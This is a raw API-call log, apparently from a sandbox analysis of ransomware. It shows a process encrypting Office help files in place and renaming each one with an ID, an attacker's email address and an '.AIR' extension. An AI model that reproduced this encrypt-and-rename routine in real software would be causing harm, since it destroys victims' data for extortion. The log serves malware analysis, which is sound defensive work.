	[0100.236] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.236] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.236] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.237] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.237] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.237] ReadFile (in: hFile=0x4c0, lpBuffer=0x56efb8, nNumberOfBytesToRead=0x188, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56efb8*, lpNumberOfBytesRead=0x3a1f778*=0x188, lpOverlapped=0x0) returned 1
	[0100.237] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-392, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.237] WriteFile (in: hFile=0x4c0, lpBuffer=0x5781b0*, nNumberOfBytesToWrite=0x188, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5781b0*, lpNumberOfBytesWritten=0x3a1f778*=0x188, lpOverlapped=0x0) returned 1
	[0100.237] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.237] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.237] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.238] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn") returned 59
	[0100.238] GetProcessHeap () returned 0x540000
	[0100.238] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xdc) returned 0x601bd0
	[0100.238] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn"
	[0100.238] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.238] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.240] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.240] GetProcessHeap () returned 0x540000
	[0100.240] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0100.240] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=350) returned 1
	[0100.240] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x15e
	[0100.240] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.240] GetProcessHeap () returned 0x540000
	[0100.240] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.240] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.240] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.241] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.241] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.241] ReadFile (in: hFile=0x4c0, lpBuffer=0x597dc8, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesRead=0x3a1f778*=0x15e, lpOverlapped=0x0) returned 1
	[0100.242] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-350, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.242] WriteFile (in: hFile=0x4c0, lpBuffer=0x56b448*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesWritten=0x3a1f778*=0x15e, lpOverlapped=0x0) returned 1
	[0100.242] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.242] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.242] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.242] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn") returned 55
	[0100.242] GetProcessHeap () returned 0x540000
	[0100.242] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd4) returned 0x5919d0
	[0100.242] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn"
	[0100.242] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.242] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.244] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.244] GetProcessHeap () returned 0x540000
	[0100.244] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0100.244] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=326) returned 1
	[0100.244] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x146
	[0100.245] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.245] GetProcessHeap () returned 0x540000
	[0100.245] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.245] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.245] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.246] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.246] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.246] ReadFile (in: hFile=0x4c0, lpBuffer=0x57fb28, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesRead=0x3a1f778*=0x146, lpOverlapped=0x0) returned 1
	[0100.246] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-326, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.246] WriteFile (in: hFile=0x4c0, lpBuffer=0x56b448*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesWritten=0x3a1f778*=0x146, lpOverlapped=0x0) returned 1
	[0100.246] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.246] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.246] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.246] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn") returned 57
	[0100.246] GetProcessHeap () returned 0x540000
	[0100.247] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd8) returned 0x5919d0
	[0100.247] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn"
	[0100.247] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.247] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.setlang.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.setlang.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.249] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.setlang.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.249] GetProcessHeap () returned 0x540000
	[0100.250] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0100.250] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=338) returned 1
	[0100.250] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x152
	[0100.250] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.250] GetProcessHeap () returned 0x540000
	[0100.250] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.250] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.250] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.251] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.251] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.251] ReadFile (in: hFile=0x4c0, lpBuffer=0x57fb28, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesRead=0x3a1f778*=0x152, lpOverlapped=0x0) returned 1
	[0100.251] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-338, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.251] WriteFile (in: hFile=0x4c0, lpBuffer=0x56b448*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesWritten=0x3a1f778*=0x152, lpOverlapped=0x0) returned 1
	[0100.251] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.251] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.251] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.252] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn") returned 62
	[0100.252] GetProcessHeap () returned 0x540000
	[0100.252] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe2) returned 0x598b60
	[0100.252] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn"
	[0100.252] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.252] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.254] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.254] GetProcessHeap () returned 0x540000
	[0100.254] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0100.254] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=368) returned 1
	[0100.254] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x170
	[0100.254] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.254] GetProcessHeap () returned 0x540000
	[0100.254] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.254] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.255] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.255] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.255] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.256] ReadFile (in: hFile=0x4c0, lpBuffer=0x56b448, nNumberOfBytesToRead=0x170, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesRead=0x3a1f778*=0x170, lpOverlapped=0x0) returned 1
	[0100.256] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-368, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.256] WriteFile (in: hFile=0x4c0, lpBuffer=0x597dc8*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesWritten=0x3a1f778*=0x170, lpOverlapped=0x0) returned 1
	[0100.256] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.256] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.256] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.257] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn") returned 58
	[0100.257] GetProcessHeap () returned 0x540000
	[0100.257] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xda) returned 0x601bd0
	[0100.257] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn"
	[0100.257] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.257] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.645] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.645] GetProcessHeap () returned 0x540000
	[0100.645] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0100.645] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=344) returned 1
	[0100.645] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x158
	[0100.645] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.645] GetProcessHeap () returned 0x540000
	[0100.645] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.645] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.646] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.647] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.647] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.648] ReadFile (in: hFile=0x4c0, lpBuffer=0x57fb28, nNumberOfBytesToRead=0x158, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesRead=0x3a1f778*=0x158, lpOverlapped=0x0) returned 1
	[0100.648] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-344, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.648] WriteFile (in: hFile=0x4c0, lpBuffer=0x597dc8*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesWritten=0x3a1f778*=0x158, lpOverlapped=0x0) returned 1
